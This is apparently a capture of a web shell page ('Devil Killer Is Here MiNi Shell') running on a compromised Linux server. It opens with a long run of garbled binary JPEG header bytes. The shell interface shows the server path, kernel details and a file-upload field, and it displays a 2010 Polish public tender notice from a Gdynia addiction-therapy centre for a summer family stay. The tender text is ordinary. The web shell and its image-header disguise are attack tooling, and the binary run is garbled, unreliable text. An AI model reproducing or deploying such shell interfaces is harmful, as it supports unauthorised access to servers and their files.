JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100409/79713-N-2010.html

<p class="kh_header"><b>Gdynia: zorganizowanie letniego pobytu wraz z wyżywieniem dla rodzin objętych pomocą Ośrodka Profilaktyki  i Terapii Uzależnień w Gdyni w sezonie letnim 2010</b><br>
<b>Numer ogłoszenia: 79713 - 2010; data zamieszczenia: 09.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Profilaktyki i Terapii Uzależnień , ul. Reja 2A, 81-441 Gdynia, woj. pomorskie, tel. 0-58 621 61 35, faks 0-58 621 61 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opitu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie letniego pobytu wraz z wyżywieniem dla rodzin objętych pomocą Ośrodka Profilaktyki  i Terapii Uzależnień w Gdyni w sezonie letnim 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego jest w miejscowość usytuowanej w odległości nie przekraczającej 150 km od miasta Gdyni. 2. Szacowana przez Zamawiającego, łączna  ilość  uczestników letniego pobytu : 84 osoby  ( 50% dorośli , 50% dzieci). Szacowana liczba uczestników  letniego pobytu  poszczególnych turnusów : I turnus - 42 osoby ( 50% dzieci , 50% dorośli )  , w tym :  40 osób z rodzin objętych pomocą Zamawiającego oraz  1 wolontariusz skierowany przez Zamawiającego  i 1 pielęgniarka skierowana przez Zamawiającego, II  turnus - 42 osoby ( 50% dzieci , 50% dorośli ) , w tym :  40 osób z rodzin objętych pomocą Zamawiającego oraz  1 wolontariusz skierowany przez Zamawiającego  i 1 pielęgniarka skierowana przez Zamawiającego . 3. Rzeczywista liczba uczestników  letniego pobytu zostanie ustalona przez Zamawiającego nie później niż w terminie 10 (słownie: dziesięciu)  dni przed datą rozpoczęcia każdego z turnusów  i przekazana (w formie pisemnej) Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą w  niniejszym postępowaniu  o udzielenie zamówienia publicznego . a/ Zamawiający  zastrzega sobie możliwość zwiększenia lub zmniejszenia liczby uczestników letniego pobytu  - nie więcej niż 10% (dziesięć procent) - w stosunku do szacowanej , łącznej ilości uczestników wskazanej wyżej. b/  Zamawiający  zastrzega sobie prawo - w przypadku braku chętnych do skorzystania z letniego pobytu  -  do jego niezorganizowania. 4. Wymagania Zamawiającego dotyczące bazy noclegowej: Wykonawca jest zobowiązany do zapewnienia uczestnikom pobytu następującej bazy noclegowej : a) pensjonat lub murowany ośrodek kolonijny  przeznaczony wyłącznie dla uczestników letniego pobytu , b) pokoje estetyczne, wyłącznie: 2 , 3 lub 4 osobowe , c) każdy z pokoi  wyposażony w pełny węzeł sanitarny , d) każdy z pokoi  wyposażony dodatkowo w: czajnik bezprzewodowy , naczynia niezbędne  do przygotowania gorących napoi ( kawa , herbata , itp.),  radio lub telewizor , lampki nocne ,  e) na terenie obiektu ( pensjonatu lub murowanego ośrodka kolonijnego) musi znajdować się boisko sportowe oraz miejsce przeznaczone na zorganizowanie ogniska , f) obiekt ( pensjonat lub murowany ośrodek kolonijny) wyposażony w: dwa pomieszczenia  ( podczas każdego z turnusów ) przeznaczone do prowadzenia zajęć terapeutycznych dla 25 osób  w każdym pomieszczeniu oraz salę dyskotekową, g) obiekt ( pensjonat lub murowany ośrodek kolonijny) spełnia wszystkie , przewidziane przepisami prawa , wymagania przeciwpożarowe.  5. W czasie trwania każdego z turnusów na terenie całego ( budynku i terenu) : pensjonatu lub ośrodka kolonijnego musi obowiązywać bezwzględny zakaz  sprzedaży  i dystrybucji napojów alkoholowych . 6. Wykonawca  będzie zobowiązany do  całodobowego udostępnienia odrębnego pomieszczenia przeznaczonego dla pielęgniarki (w obiekcie przeznaczonym dla uczestników letniego pobytu). 7. Wymagania Zamawiającego dotyczące wyposażenia bazy noclegowej w sprzęt sportowy i rekreacyjny. Wykonawca jest zobowiązany do zapewnienia uczestnikom pobytu następującego sprzętu sportowego i rekreacyjnego : a) stół do ping-ponga ( łącznie z siatką , rakietkami - minimum 4 oraz piłeczkami - minimum 10 sztuk), b) badminton - minimum 4 komplety łącznie z lotkami  - minimum 10 sztuk , c) piłki do gry:  w siatkówkę  oraz  nożną ( minimum - po 2 sztuki ) , d) gry zręcznościowe ( np. piłkarzyki - minimum 1 sztuka) . Wskazane byłoby także zapewnienie przez Wykonawcę bilarda stołowego  ( łącznie z kijami - minimum 4 oraz kompletem bil).  8. Zamawiający  dokona oceny spełniania  warunków wskazanych w pkt.4 -7  na podstawie : - w odniesieniu do bazy noclegowej : a) danych  Wykonawcy zawartych w załączniku do Specyfikacji Istotnych Warunków Zamówienia - DANE DOTYCZĄCE BAZY NOCLEGOWEJ  PRZEZNACZONEJ DLA UCZESTNIKÓW LETNIEGO POBYTU, b) zdjęć (czytelnych) :  bazy noclegowej (obiektu) ,  pokoi (wybranych) przeznaczonych przez Wykonawcę   dla uczestników letniego pobytu ,  sali dyskotekowej,  pomieszczeń przeznaczonych do prowadzenia zajęć terapeutycznych,  c) oględzin (przeprowadzonych przez upoważnionego przedstawiciela /przedstawicieli Zamawiającego po terminie składania ofert ) obiektów  i pokoi przeznaczonych przez Wykonawcę do realizacji przedmiotu zamówienia w celu zweryfikowania spełnienia warunków określonych w Specyfikacji Istotnych Warunków Zamówienia przez Zamawiającego oraz potwierdzonych przez Wykonawcę w złożonej ofercie .   O terminie oględzin Zamawiający poinformuje w formie pisemnej, z minimum 2 dniowym wyprzedzeniem. Wykonawca jest zobowiązany do udostępnienia obiektów i pokoi w terminie wyznaczonym przez Zamawiającego . W oględzinach musi uczestniczyć upoważniony przedstawiciel Wykonawcy. Z oględzin zostanie sporządzony protokół podpisany przez : przedstawiciela/i Zamawiającego i przedstawiciela/i  Wykonawcy obecnych podczas dokonywania oględzin . W przypadku odmowy podpisania protokołu przez  przedstawiciela/i  Wykonawcy - protokół zostanie podpisany jednostronnie przez przedstawiciela/i  Zamawiającego . - w odniesieniu do wyposażenia bazy noclegowej w sprzęt sportowy i rekreacyjny  : a) danych  Wykonawcy zawartych w załączniku do Specyfikacji Istotnych Warunków Zamówienia - DANE DOTYCZĄCE  SPRZĘTU SPORTOWEGO I REKREACYJNEGO PRZEZNACZONEGO DLA UCZESTNIKÓW LETNIEGO POBYTU. 9.  Wymagania Zamawiającego dotyczące wyżywienia uczestników letniego pobytu : Wykonawca  będzie zobowiązany do zapewnienia czterech posiłków dziennie (dla dzieci)  oraz trzech posiłków dziennie (dla dorosłych) przygotowywanych zgodnie z obowiązującymi przepisami sanitarno-epidemiologicznymi. Łączna, dobowa, kaloryczność posiłków  nie może być mniejsza od 2 400 kcal / osobę, z czego co najmniej 40% ( 960 kcal) musi przypadać na dwudaniowy obiad. 10. Zamawiający  dokona oceny spełniania  warunków wskazanych w pkt.9 na podstawie   szczegółowego jadłospisu - sporządzonego przez Wykonawcę na załączniku do Specyfikacji Istotnych Warunków Zamówienia (JADŁOSPIS  DLA UCZESTNIKÓWLETNIEGO POBYTU)  - na podstawie wskazanych przez Wykonawcę (w w/w załączniku) artykułów spożywczych , których użycie przewiduje do wykonania  posiłków  oraz ich gramatury. 11. Wykonawca będzie zobowiązany do zapewnienia uczestnikom letniego pobytu : a) natychmiastowego transportu do odpowiedniego zakładu opieki zdrowotnej zapewniającego pomoc medyczną zgodnie z obowiązującymi przepisami , b) podstawowych leków oraz  podstawowych środków higienicznych,  c) odrębnego pomieszczenia (całodobowo)  dla pielęgniarki skierowanej przez Zamawiającego. 12. Wykonawca będzie  zobowiązany do przygotowania zaplecza technicznego do zorganizowania  ogniska  i zakupienia kiełbasek na jedno ognisko dla uczestników letniego pobytu ( dotyczy każdego z turnusów ) . 13. Wykonawca będzie zobowiązany do pokrycia kosztów ubezpieczenia uczestników letniego pobytu w czasie jego trwania (NNW- minimum  10 000 zł - w odniesieniu do każdego uczestnika ) - przez cały okres trwania każdego z turnusów  (od przyjazdu uczestników pobytu do miejsca zakwaterowania wskazanego do wyjazdu uczestników  pobytu z tego miejsca ) , Przyjazd uczestników pobytu nastąpi nie później niż do godz.10.00 ( rano ) pierwszego dnia , powrót (wyjazd z miejsca pobytu) nie wcześniej niż o godz.15.00 ostatniego dnia . W terminie poprzedzającym podpisanie umowy - Wykonawca , którego oferta zostanie uznana za najkorzystniejszą  będzie zobowiązany do przedłożenia Zamawiającemu poświadczonej za zgodność z oryginałem kserokopii polisy ubezpieczeniowej  NNW uczestników pobytu na okres trwania każdego z turnusów . 14. Zamawiający wymaga , aby przedmiot zamówienia zrealizowany był zgodnie z warunkami umowy, której wzór zawarty został w SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 28.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 1 366 zł (słownie: tysiąc trzysta sześćdziesiąt sześć złotych) oraz zabezpieczenia należytego wykonania umowy w wysokości 5% (słownie: pięć procent) ceny brutto pomnożonej przez 84. Wykonawcy zobowiązani są dołączyć do oferty dowód wpłacenia / wniesienia wadium w wysokości , terminie i formie określonej w Specyfikacji Istotnych Warunków Zamówienia dotyczącej przedmiotowego postępowania o udzielenie zamówienia publicznego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu niniejszego postępowania o udzielenie zamówienia publicznego nie wymaga posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Minimalny poziom wymaganych przez Zamawiającego standardów został określony: a) w odniesieniu do bazy noclegowej - w pkt. II.1.3) ppkt. 3 niniejszego ogłoszenia, b) w odniesieniu do wyposażenia bazy noclegowej w sprzęt sportowy i rekreacyjny - w pkt. II.1.3) ppkt. 4 niniejszego ogłoszenia. Wykonawca może polegać na potencjale technicznym innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełniania przez Wykonawcę w/w warunku udziału w postępowaniu zostanie dokonana na podstawie złożonych w tym postępowaniu przez Wykonawcę - dokumentów i oświadczeń</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi legitymować się posiadaniem środków finansowych  lub zdolnością kredytową na kwotę nie niższą od 25 000 zł (słownie: dwadzieścia  pięć tysięcy złotych). Wykonawca może polegać na zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności  przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli Wykonawca  , wykazując spełnianie tego warunku , polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust.2b ustawy , Zamawiający wymaga przedłożenia w/w informacji dotyczącej tych podmiotów. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdzi spełnianie opisanego przez Zamawiającego warunku. Informacje o których mowa wyżej , określone w  walucie innej niż PLN, będą przeliczane  na podstawie średniego kursu NBP obowiązującego  w dniu opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Ocena spełniania przez Wykonawcę w/w warunku udziału w postępowaniu zostanie dokonana na podstawie złożonych w tym postępowaniu przez Wykonawcę - dokumentów i oświadczeń</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1/ wypełniony jadłospis dla uczestników letniego pobytu - na załączniku do Specyfikacji Istotnych Warunków Zamówienia, 2/ zdjęcia (czytelne): bazy noclegowej (obiektu),  pokoi (wybranych) przeznaczonych przez Wykonawcę dla uczestników letniego pobytu, sali dyskotekowej, pomieszczeń przeznaczonych do prowadzenia zajęć terapeutycznych</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.opitu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Profilaktyki i Terapii Uzależnień ul.Reja 2A 81-441 Gdynia I piętro , pok. nr 10,  dokument nieodpłatny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2010 godzina 14:30, miejsce: Ośrodek Profilaktyki i Terapii Uzależnień ul.Reja 2A 81-441 Gdynia I piętro , pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




